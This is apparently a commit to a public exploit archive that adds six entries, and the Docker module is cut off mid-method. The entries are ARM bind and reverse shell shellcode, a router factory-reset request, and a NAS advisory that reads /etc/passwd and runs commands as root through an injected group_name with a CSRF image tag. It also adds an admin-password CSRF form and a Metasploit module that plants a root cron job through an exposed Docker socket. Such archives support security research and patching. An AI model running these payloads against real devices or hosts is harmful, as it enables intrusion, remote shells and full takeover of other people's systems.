DB: 2017-09-12
6 new exploits Docker Daemon - Unprotected TCP Socket (Metasploit) Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes) Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes) Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin) FiberHome ADSL AN1020-25 - Improper Access Restrictions WiseGiga NAS - Multiple Vulnerabilities
This commit is contained in:
parent
7744909119
commit
36667e62bc
7 changed files with 714 additions and 0 deletions
|
@ -15797,6 +15797,7 @@ id,file,description,date,author,platform,type,port
|
|||
42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
|
||||
42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
|
||||
42630,platforms/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
|
||||
42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -16443,6 +16444,8 @@ id,file,description,date,author,platform,type,port
|
|||
42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
|
||||
42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
|
||||
42594,platforms/lin_x86/shellcode/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",lin_x86,shellcode,0
|
||||
42646,platforms/arm/shellcode/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
|
||||
42647,platforms/arm/shellcode/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -38427,3 +38430,6 @@ id,file,description,date,author,platform,type,port
|
|||
42643,platforms/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
|
||||
42644,platforms/php/webapps/42644.html,"Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
|
||||
42645,platforms/php/webapps/42645.txt,"My Builder Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
|
||||
42648,platforms/php/webapps/42648.html,"Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)",2017-09-11,"Ihsan Sencan",php,webapps,0
|
||||
42649,platforms/hardware/webapps/42649.txt,"FiberHome ADSL AN1020-25 - Improper Access Restrictions",2017-09-05,"Ibad Shah",hardware,webapps,0
|
||||
42651,platforms/hardware/webapps/42651.txt,"WiseGiga NAS - Multiple Vulnerabilities",2017-09-11,"Pierre Kim",hardware,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
89
platforms/arm/shellcode/42646.c
Executable file
89
platforms/arm/shellcode/42646.c
Executable file
|
@ -0,0 +1,89 @@
|
|||
/*
|
||||
|
||||
##################################
|
||||
# Andrea Sindoni - @invictus1306 #
|
||||
##################################
|
||||
|
||||
This schellcode is part of my episodes:
|
||||
- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/
|
||||
|
||||
Enviroment: Raspberry pi 3
|
||||
|
||||
Default settings for port:4444
|
||||
|
||||
@.syntax unified
|
||||
.global _start
|
||||
_start:
|
||||
|
||||
mov r1, #0x5C @ r1=0x5c
|
||||
mov r5, #0x11 @ r5=0x11
|
||||
mov r1, r1, lsl #24 @ r1=0x5c000000
|
||||
add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) --- Please change me
|
||||
add r1, #2 @ r1=0x5c110002 - sin_family+sin_port
|
||||
sub r2, r2, r2 @ sin_addr
|
||||
push {r1, r2} @ push into the stack r1 and r2
|
||||
mov r1, sp @ save pointer to sockaddr_in struct
|
||||
mov r2, #0x10 @ addrlen
|
||||
mov r0, r6 @ mov sockfd into r0
|
||||
ldr r7, =#282 @ bind syscall
|
||||
swi 0
|
||||
|
||||
@ listen for incoming connections via SYS_LISTEN
|
||||
@ int listen(int sockfd, int backlog);
|
||||
|
||||
mov r0, r6 @ mov sockfd into r0
|
||||
mov r1, #1 @ backlog=1
|
||||
ldr r7, =#284 @ listen syscall
|
||||
swi 0
|
||||
|
||||
@ Accept connections
|
||||
@ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
|
||||
|
||||
mov r0, r6 @ mov sockfd into r0
|
||||
sub r1, r1, r1 @ addr=0
|
||||
sub r2, r2, r2 @ addrlen=0
|
||||
ldr r7, =#285 @ accept syscall
|
||||
swi 0
|
||||
|
||||
@ Redirect stdin, stdout and stderr via dup2
|
||||
|
||||
mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2)
|
||||
loop:
|
||||
mov r7, #63 @ dup2 syscall
|
||||
swi 0
|
||||
sub r1, r1, #1 @ decrement counter
|
||||
cmp r1, #-1 @ compare r1 with -1
|
||||
bne loop @ if the result is not equal jmp to loop
|
||||
|
||||
@ int execve(const char *filename, char *const argv[],char *const envp[]);
|
||||
mov r0, pc
|
||||
add r0, #32
|
||||
sub r2, r2, r2
|
||||
push {r0, r2}
|
||||
mov r1, sp
|
||||
mov r7, #11
|
||||
swi 0
|
||||
|
||||
_exit:
|
||||
mov r0, #0
|
||||
mov r7, #1
|
||||
swi 0 @ exit(0)
|
||||
|
||||
.asciz "/bin/sh"
|
||||
|
||||
Assemble and link it:
|
||||
as -o bind.o bind.s
|
||||
ld -o bind bind.o
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
|
||||
char *code="\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\xa0\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x70\x70\x9f\xe5\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\xa0\xe3\x47\x7f\xa0\xe3\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\x41\xe0\x02\x20\x42\xe0\x50\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xfa\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\x1a\x01\x00\x00\x1d\x01\x00\x00";
|
||||
|
||||
int main(void) {
|
||||
|
||||
(*(void(*)()) code)();
|
||||
|
||||
return 0;
|
||||
|
||||
}
|
71
platforms/arm/shellcode/42647.c
Executable file
71
platforms/arm/shellcode/42647.c
Executable file
|
@ -0,0 +1,71 @@
|
|||
/*
|
||||
|
||||
##################################
|
||||
# Andrea Sindoni - @invictus1306 #
|
||||
##################################
|
||||
|
||||
This schellcode is part of my episodes:
|
||||
- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/
|
||||
|
||||
Enviroment: Raspberry pi 3
|
||||
|
||||
Default settings for port:4444 ip:192.168.0.12
|
||||
|
||||
.global _start
|
||||
_start:
|
||||
|
||||
mov r1, #0x5C @ r1=0x5c
|
||||
mov r5, #0x11 @ r5=0x11
|
||||
mov r1, r1, lsl #24 @ r1=0x5c000000
|
||||
add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) -- please change me
|
||||
add r1, #2 @ r1=0x5c110002 - sin_family+sin_port
|
||||
ldr r2, =#0x0c00a8c0 @ sin_addr=192.168.0.12 each octet is represented by one byte -- please change me
|
||||
push {r1, r2} @ push into the stack r1 and r2
|
||||
mov r1, sp @ save pointer to sockaddr_in struct
|
||||
|
||||
mov r2, #0x10 @ addrlen
|
||||
mov r0, r6 @ mov sockfd into r0
|
||||
ldr r7, =#283 @ connect syscall
|
||||
swi 0
|
||||
|
||||
@ Redirect stdin, stdout and stderr via dup2
|
||||
mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2)
|
||||
loop:
|
||||
mov r0, r6 @ mov sockfd into r0
|
||||
mov r7, #63 @ dup2 syscall
|
||||
swi 0
|
||||
sub r1, r1, #1 @ decrement counter
|
||||
cmp r1, #-1 @ compare r1 with -1
|
||||
bne loop @ if the result is not equal jmp to loop
|
||||
|
||||
@ int execve(const char *filename, char *const argv[],char *const envp[]);
|
||||
|
||||
mov r0, pc
|
||||
add r0, #32
|
||||
sub r2, r2, r2
|
||||
push {r0, r2}
|
||||
mov r1, sp
|
||||
mov r7, #11
|
||||
swi 0
|
||||
|
||||
_exit:
|
||||
mov r0, #0
|
||||
mov r7, #1
|
||||
swi 0 @ exit(0)
|
||||
|
||||
shell: .asciz "/bin/sh"
|
||||
|
||||
|
||||
Assemble and link it:
|
||||
as -o reverse_shell.o reverse_shell.s
|
||||
ld -o reverse_shell reverse_shell.o
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
|
||||
char *code= "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\x80\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x64\x20\x9f\xe5\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x54\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xf9\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\xc0\xa8\x00\x0c\x1b\x01\x00\x00";
|
||||
|
||||
int main(void) {
|
||||
(*(void(*)()) code)();
|
||||
return 0;
|
||||
}
|
135
platforms/hardware/webapps/42649.txt
Executable file
135
platforms/hardware/webapps/42649.txt
Executable file
|
@ -0,0 +1,135 @@
|
|||
Title:
|
||||
====
|
||||
|
||||
FiberHome Unauthenticated ADSL Router Factory Reset.
|
||||
|
||||
Credit:
|
||||
======
|
||||
|
||||
Name: Ibad Shah
|
||||
Twitter: @BeeFaauBee09
|
||||
Website: beefaaubee09.github.io
|
||||
|
||||
|
||||
CVE:
|
||||
=====
|
||||
|
||||
CVE-2017-14147
|
||||
|
||||
Date:
|
||||
====
|
||||
|
||||
05-09-2017 (dd/mm/yyyy)
|
||||
|
||||
About FiberHome:
|
||||
======
|
||||
|
||||
FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.
|
||||
|
||||
Products & Services:
|
||||
Wireless 3G/4G broadband devices
|
||||
Custom engineered technologies
|
||||
Broadband devices
|
||||
|
||||
URL : http://www.fiberhomegroup.com/
|
||||
|
||||
|
||||
Description:
|
||||
=======
|
||||
|
||||
This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password.
|
||||
|
||||
|
||||
|
||||
Affected Device Model:
|
||||
=============
|
||||
|
||||
FiberHome ADSL AN1020-25
|
||||
|
||||
|
||||
Exploitation-Technique:
|
||||
===================
|
||||
|
||||
Remote
|
||||
|
||||
|
||||
Details:
|
||||
=======
|
||||
|
||||
Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials.
|
||||
|
||||
1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147
|
||||
|
||||
Vulnerable restoreinfo.cgi
|
||||
|
||||
|
||||
|
||||
Proof Of Concept:
|
||||
================
|
||||
|
||||
PoC :
|
||||
|
||||
GET /restoreinfo.cgi HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.8
|
||||
Connection: close
|
||||
|
||||
|
||||
HTTP/1.1 200 Ok
|
||||
Server: micro_httpd
|
||||
Cache-Control: no-cache
|
||||
Date: Sat, 01 Jan 2000 00:12:39 GMT
|
||||
Content-Type: text/html
|
||||
Connection: close
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
|
||||
<link rel=stylesheet href='stylemain.css' type='text/css'>
|
||||
<link rel=stylesheet href='colors.css' type='text/css'>
|
||||
<script language="javascript">
|
||||
<!-- hide
|
||||
|
||||
function restore() {
|
||||
var enblPopWin = '0';
|
||||
var loc = 'main.html';
|
||||
var code = 'window.top.location="' + loc + '"';
|
||||
|
||||
if ( enblPopWin == '1' ) {
|
||||
loc = 'index.html';
|
||||
code = 'location="' + loc + '"';
|
||||
}
|
||||
|
||||
eval(code);
|
||||
}
|
||||
|
||||
function frmLoad() {
|
||||
setTimeout("restore()", 60000);
|
||||
}
|
||||
|
||||
// done hiding -->
|
||||
</script>
|
||||
</head>
|
||||
|
||||
<body onLoad='frmLoad()'>
|
||||
<blockquote>
|
||||
<b>DSL Router Restore</b><br><br>
|
||||
The DSL Router configuration has been restored to default settings and the
|
||||
router is rebooting.<br><br>
|
||||
Close the DSL Router Configuration window and wait for 2 minutes before
|
||||
reopening your web browser. If necessary, reconfigure your PC's IP address to
|
||||
match your new configuration.
|
||||
</blockquote>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
|
||||
Credits:
|
||||
=======
|
||||
|
||||
Ibad Shah, Taimooor Zafar, Owais Mehtab
|
171
platforms/hardware/webapps/42651.txt
Executable file
171
platforms/hardware/webapps/42651.txt
Executable file
|
@ -0,0 +1,171 @@
|
|||
Source: https://blogs.securiteam.com/index.php/archives/3402
|
||||
|
||||
Vulnerabilities summary
|
||||
The following advisory describes five (5) vulnerabilities and default accounts / passwords found in WiseGiga NAS devices.
|
||||
|
||||
WiseGiga is a Korean company selling NAS products.
|
||||
|
||||
The vulnerabilities found in WiseGiga NAS are:
|
||||
|
||||
Pre-Authentication Local File Inclusion (4 different vulnerabilities)
|
||||
Post-Authentication Local File Inclusion
|
||||
Remote Command Execution as root
|
||||
Remote Command Execution as root with CSRF
|
||||
Info Leak
|
||||
Default accounts
|
||||
|
||||
|
||||
Credit
|
||||
An independent security researcher, Pierre Kim, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
|
||||
|
||||
|
||||
Vendor response
|
||||
We tried to contact WiseGiga since June 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
|
||||
|
||||
|
||||
Vulnerabilities details
|
||||
|
||||
Pre-Authentication Local File Inclusion
|
||||
User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).
|
||||
|
||||
By sending GET request to the following URI’s with filename= as a parameter, an attacker can trigger the vulnerabilities:
|
||||
|
||||
/webfolder/download_file1.php
|
||||
down_data.php
|
||||
download_file.php
|
||||
mobile/download_file1.php
|
||||
|
||||
|
||||
Proof of Concept
|
||||
http://IP/webfolder/download_file1.php?filename=/etc/passwd
|
||||
http://IP/down_data.php?filename=/etc/passwd
|
||||
http://IP/download_file.php?filename=base64(/etc/passwd)
|
||||
http://IP/mobile/download_file1.php?filename=base64(/etc/passwd)
|
||||
|
||||
Post-Authentication Local File Inclusion
|
||||
User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).
|
||||
|
||||
By sending GET request to /mobile/download_file2.php an attacker can trigger the vulnerability.
|
||||
|
||||
|
||||
Proof of Concept
|
||||
http://IP//mobile/download_file2.php?filename=base64(/etc/passwd)
|
||||
|
||||
|
||||
Remote Command Execution as root
|
||||
The WiseGiga NAS firmware contain pre.php files in the different directories.
|
||||
|
||||
For example:
|
||||
/app_data/apache/htdocs/auto/pre.php
|
||||
/app_data/apache/htdocs/admin/iframe/pre.php
|
||||
/app_data/apache/htdocs/admin/pre.php
|
||||
/app_data/apache/htdocs/mobile/pre.php
|
||||
/app_data/apache/htdocs/wiseapp/config/pre.php
|
||||
/app_data/apache/htdocs/pre.php
|
||||
/home/htdocs/webfolder/pre.php
|
||||
/ub/update/init/pre.php
|
||||
/tmp/home/root/htdocs/auto/pre.php
|
||||
/tmp/home/root/htdocs/pre.php
|
||||
|
||||
|
||||
A “standard” pre.php contains:
|
||||
|
||||
181 [...]
|
||||
182 function auth()
|
||||
183 {
|
||||
184 global $memberid;
|
||||
185 session_start();
|
||||
186 //echo $memberid;
|
||||
187 if($memberid=="root")
|
||||
188 {
|
||||
189 // print<<<__DATA_OF_HTML__
|
||||
190 //<script language="JavaScript">
|
||||
191 // alert("sucess !");
|
||||
192 //</script>
|
||||
193 //__DATA_OF_HTML__;
|
||||
194 }
|
||||
195 else
|
||||
196 {
|
||||
197 print<<<__DATA_OF_HTML__
|
||||
198 <script language="JavaScript">
|
||||
199 alert("\xc0\xce\xc1\xf5\xb9\xde\xc1\xf6 \xbe\xca\xc0\xba \xbb\xe7\xbf\xeb\xc0\xda\xc0\xd4\xb4\xcf\xb4\xd9!");
|
||||
200 // location.href='/admin/';
|
||||
201 window.open('index.php','_parent');
|
||||
202 exit;
|
||||
203 </script>
|
||||
204 __DATA_OF_HTML__;
|
||||
205 }
|
||||
206
|
||||
207 }
|
||||
|
||||
|
||||
Using global $memberid (line 184), the attacker can override the authentication, by specifying a valid user (“root”) inside the HTTP request:
|
||||
|
||||
GET /webpage[...]?memberid=root&[...] HTTP/1.0
|
||||
|
||||
|
||||
The pre.php files also contains a function called root_exec_cmd() that is a wrapper to popen():
|
||||
|
||||
23 function root_exec_cmd($cmd)
|
||||
24 {
|
||||
25 $tmpfile=fopen("/tmp/ramdisk/cmd.list","w");
|
||||
26 fwrite($tmpfile,$cmd);
|
||||
27 fclose($tmpfile);
|
||||
28 popen("/tmp/ramdisk/ramush","r");
|
||||
29 }
|
||||
|
||||
By sending a GET request to root_exec_cmd() with user controlled $cmd variable input an attacker can execute arbitrary commands
|
||||
|
||||
The WiseGiga NAS run’s the Apache server as root (uid=0 with gid=48 “apache”) hence the commands will execute as root.
|
||||
|
||||
|
||||
Proof of Concept
|
||||
By sending GET request to /admin/group.php with parameter ?cmd=add the WiseGiga NAS will call the add_system() function:
|
||||
|
||||
178 if($cmd == "add")
|
||||
179 {
|
||||
180 add_system();
|
||||
181 }
|
||||
|
||||
The add_system() function uses global for $group_name and $user_data.
|
||||
|
||||
Then it will pass the user controlled input and will run it as root:
|
||||
|
||||
145 function add_system()
|
||||
146 {
|
||||
147 global $group_name,$user_data;
|
||||
148
|
||||
149 if(add_conf()==1)
|
||||
150 {
|
||||
151 //====================================================================================
|
||||
152 root_exec_cmd("addgroup $group_name");
|
||||
|
||||
|
||||
An attacker can get unauthenticated RCE as root by sending the following request:
|
||||
|
||||
http://IP/admin/group.php?memberid=root&cmd=add&group_name=d;id%20>%20/tmp/a
|
||||
|
||||
The file /tmp/a will contain:
|
||||
|
||||
uid=0(root) gid=48(apache) groups=48(apache)
|
||||
|
||||
|
||||
Remote Command Execution as root with CSRF
|
||||
There is no CSRF protection in WiseGiga NAS.
|
||||
|
||||
An attacker can force the execution of a command as root when the victim visits the malicious website.
|
||||
|
||||
|
||||
Proof of Concept
|
||||
Once the victim visit the attacker’s website with the following code, the attacker can execute arbitrary commands.
|
||||
|
||||
<img src="http://192.168.1.1/admin/group.php?memberid=root&cmd=add&group_name=d;COMMANDTOEXECUTE">
|
||||
|
||||
|
||||
InfoLeak
|
||||
accessing http://IP/webfolder/config/config.php will disclose the PHP configuration.
|
||||
|
||||
|
||||
Default accounts
|
||||
Username: guest
|
||||
Password: guest09#$
|
35
platforms/php/webapps/42648.html
Executable file
35
platforms/php/webapps/42648.html
Executable file
|
@ -0,0 +1,35 @@
|
|||
<!--
|
||||
# # # # #
|
||||
# Exploit Title: Nimble Professional - Mobile Marketing Text Blast Web Application 1.0 - Cross-Site Request Forgery (Update Admin)
|
||||
# Dork: N/A
|
||||
# Date: 11.09.2017
|
||||
# Vendor Homepage: http://ranksol.com/
|
||||
# Software Link: http://www.mojomarketplace.com/item/nimble-pro
|
||||
# Demo: http://demo.ranksol.com/demos/nimble-messaging-bulk-sms-marketing-application-for-business-pro-version/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
#
|
||||
# Proof of Concept:
|
||||
-->
|
||||
<html>
|
||||
<body>
|
||||
<label>Edit Profile:</label>
|
||||
<form method="post" class="form-horizontal" action="http://localhost/[PATH]/ajax.php">
|
||||
<label>Admin Name:</label>
|
||||
<input type="text" name="name" style="width: 400px;" value="Admin">
|
||||
<label>Admin Email:</label>
|
||||
<input type="text" name="email" style="width: 400px;" value="a@a.com">
|
||||
<label>Admin Password:</label>
|
||||
<input type="text" name="pass" style="width: 400px;" value="efe">
|
||||
<button type="submit" class="btn btn-success" >Save Profile</button>
|
||||
<input type="hidden" name="cmd" value="save_profile">
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
207
platforms/python/remote/42650.rb
Executable file
207
platforms/python/remote/42650.rb
Executable file
|
@ -0,0 +1,207 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Docker Daemon - Unprotected TCP Socket Exploit',
|
||||
'Description' => %q{
|
||||
Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp
|
||||
with tls but without tls-auth), an attacker can create a Docker
|
||||
container with the '/' path mounted with read/write permissions on the
|
||||
host server that is running the Docker container. As the Docker
|
||||
container executes command as uid 0 it is honored by the host operating
|
||||
system allowing the attacker to edit/create files owned by root. This
|
||||
exploit abuses this to creates a cron job in the '/etc/cron.d/' path of
|
||||
the host server.
|
||||
|
||||
The Docker image should exist on the target system or be a valid image
|
||||
from hub.docker.com.
|
||||
},
|
||||
'Author' => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['URL', 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'],
|
||||
['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket']
|
||||
],
|
||||
'DisclosureDate' => 'Jul 25, 2017',
|
||||
'Targets' => [
|
||||
[ 'Python', {
|
||||
'Platform' => 'python',
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Payload' => {
|
||||
'Compat' => {
|
||||
'ConnectionType' => 'reverse noconn none tunnel'
|
||||
}
|
||||
}
|
||||
}]
|
||||
],
|
||||
'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' },
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(2375),
|
||||
OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
|
||||
OptString.new('CONTAINER_ID', [ false, 'container id you would like'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def check_image(image_id)
|
||||
vprint_status("Check if images exist on the target host")
|
||||
res = send_request_raw(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri('images', 'json')
|
||||
)
|
||||
return unless res and res.code == 200 and res.body.include? image_id
|
||||
|
||||
res
|
||||
end
|
||||
|
||||
def pull_image(image_id)
|
||||
print_status("Trying to pulling image from docker registry, this may take a while")
|
||||
res = send_request_raw(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri('images', 'create?fromImage=' + image_id)
|
||||
)
|
||||
return unless res.code == 200
|
||||
|
||||
res
|
||||
end
|
||||
|
||||
def make_container_id
|
||||
return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
|
||||
|
||||
rand_text_alpha_lower(8)
|
||||
end
|
||||
|
||||
def make_cmd(mnt_path, cron_path, payload_path)
|
||||
vprint_status('Creating the docker container command')
|
||||
echo_cron_path = mnt_path + cron_path
|
||||
echo_payload_path = mnt_path + payload_path
|
||||
|
||||
cron_command = "python #{payload_path}"
|
||||
payload_data = payload.raw
|
||||
|
||||
command = "echo \"#{payload_data}\" >> #{echo_payload_path} && "
|
||||
command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && "
|
||||
command << "echo \"\" >> #{echo_cron_path} && "
|
||||
command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}"
|
||||
|
||||
command
|
||||
end
|
||||
|
||||
def make_container(mnt_path, cron_path, payload_path)
|
||||
vprint_status('Setting container json request variables')
|
||||
{
|
||||
'Image' => datastore['DOCKERIMAGE'],
|
||||
'Cmd' => make_cmd(mnt_path, cron_path, payload_path),
|
||||
'Entrypoint' => %w[/bin/sh -c],
|
||||
'HostConfig' => {
|
||||
'Binds' => [
|
||||
'/:' + mnt_path
|
||||
]
|
||||
}
|
||||
}
|
||||
end
|
||||
|
||||
def del_container(container_id)
|
||||
send_request_raw(
|
||||
{
|
||||
'method' => 'DELETE',
|
||||
'uri' => normalize_uri('containers', container_id)
|
||||
},
|
||||
1 # timeout
|
||||
)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri('containers', 'json'),
|
||||
'headers' => { 'Accept' => 'application/json' }
|
||||
)
|
||||
|
||||
if res.nil?
|
||||
print_error('Failed to connect to the target')
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if res and res.code == 200 and res.headers['Server'].include? 'Docker'
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
# check if target is vulnerable
|
||||
unless check == Exploit::CheckCode::Vulnerable
|
||||
fail_with(Failure::Unknown, 'Failed to connect to the target')
|
||||
end
|
||||
|
||||
# check if image is not available, pull it or fail out
|
||||
image_id = datastore['DOCKERIMAGE']
|
||||
if check_image(image_id).nil?
|
||||
fail_with(Failure::Unknown, 'Failed to pull the docker image') if pull_image(image_id).nil?
|
||||
end
|
||||
|
||||
# create required information to create json container information.
|
||||
cron_path = '/etc/cron.d/' + rand_text_alpha(8)
|
||||
payload_path = '/tmp/' + rand_text_alpha(8)
|
||||
mnt_path = '/mnt/' + rand_text_alpha(8)
|
||||
container_id = make_container_id
|
||||
|
||||
# create container
|
||||
res_create = send_request_raw(
|
